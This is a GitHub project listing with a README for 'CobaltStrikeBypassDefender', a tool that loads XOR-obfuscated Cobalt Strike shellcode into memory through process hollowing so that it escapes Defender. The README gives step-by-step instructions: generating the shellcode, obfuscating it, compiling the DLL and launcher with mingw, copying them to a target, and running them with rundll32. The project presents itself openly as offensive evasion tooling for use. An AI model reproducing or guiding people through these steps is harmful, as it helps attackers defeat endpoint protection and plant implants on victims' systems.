https://github.com/processust/cobaltstrikebypassdefender

A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique
https://github.com/processust/cobaltstrikebypassdefender

cobalt dll hollowing malware process shellcode strike

Last synced: about 2 months ago
JSON representation

A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique

• Host: GitHub
• URL: https://github.com/processust/cobaltstrikebypassdefender
• Owner: ProcessusT
• Created: 2022-11-11T08:50:39.000Z (about 2 years ago)
• Default Branch: main
• Last Pushed: 2022-11-11T09:11:33.000Z (about 2 years ago)
• Last Synced: 2024-01-18T07:10:24.135Z (about 1 year ago)
• Topics: cobalt, dll, hollowing, malware, process, shellcode, strike
• Language: C++
• Homepage:
• Size: 1.53 MB
• Stars: 21
• Watchers: 3
• Forks: 9
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        
# CobaltStrikeBypassDefender





A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique






-----------------------------------------------------






    My youtube video on this repo : 



    

       

    

  






-----------------------------------------------------




### Usage

1. Generate a x64 cobalt strike shellcode with CSSG :

```

https://github.com/RCStep/CSSG

```

2. Copy your shellcode in obfu.cpp (in "ANTIVIRUS_EXCLUDED_FOLDER" folder) and compile it :

```  

C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp

```

3. Execute obfu.exe, give your own xor secret

4. Copy obfuscated-shellcode.cpp content in dll.cpp file and update shellcode char array variable in process hollowing functions

5. Compile dll.cpp and launcher.cpp :

```

C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp

C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp

```

6. Copy launcher.exe, shellcode.dll and the 3 library files on your target and execute launcher.exe or trigger the RunThatShit function with rundll32 :

```

rundll32 shellcode.dll, RunThatShit

```

7. Enjoy :)





-----------------------------------------------------------------------------------







    My blog : https://lestutosdeprocessus.fr

    


    


    My Discord server : https://discord.gg/JJNxV2h